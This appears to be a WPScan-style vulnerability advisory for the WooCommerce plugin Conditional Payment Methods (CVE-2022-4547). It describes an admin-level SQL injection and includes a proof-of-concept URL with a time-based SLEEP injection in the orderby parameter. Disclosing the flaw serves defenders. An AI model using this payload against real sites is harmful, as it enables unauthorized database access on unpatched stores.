WordPress Plugin Vulnerabilities

Conditional Payment Methods for WooCommerce <= 1.0 - Admin+ SQLi

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by [high privilege users such as admin|users with a role as low as admin.

Proof of Concept

https://example.com/wp-admin/admin.php?page=wcpma-payment-settings&action=wcpma_view_list&orderby=1+AND+(SELECT+7394+FROM+(SELECT(SLEEP(5)))UrUZ)

Affects Plugins

Plugin icon
conditional-payment-methods-for-woocommerce
No known fix

References

CVE
CVE-2022-4547
URL
https://bulletin.iese.de/post/conditional-payment-methods-for-woocommerce_1-0/

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
Kunal Sharma (University of Kaiserslautern), Daniel Krohmer (Fraunhofer IESE)
Submitter
Daniel Krohmer
Submitter website
https://iese.fraunhofer.de/en.html
Verified
Yes
WPVDB ID
fe1514b4-74e1-4c19-8741-c0d4db9bab99

Timeline

Publicly Published
2022-12-24 (about 11 months ago)
Added
2022-12-24 (about 11 months ago)
Last Updated
2022-12-24 (about 11 months ago)

Other

Published
Title
Published
2014-08-01
Title
Wp-ImageZoom - zoom.php id Parameter SQL Injection
Published
2022-11-14
Title
Chaty < 3.0.3 - Admin+ SQLi
Published
2015-05-25
Title
GigPress <= 2.3.8 - Authenticated SQL Injection
Published
2014-08-01
Title
NOSpamPTI 2.1 - wp-comments-post.php comment_post_ID Parameter SQL Injection
Published
2017-08-24
Title
WordPress 2.3.0-4.7.4 - Authenticated SQL injection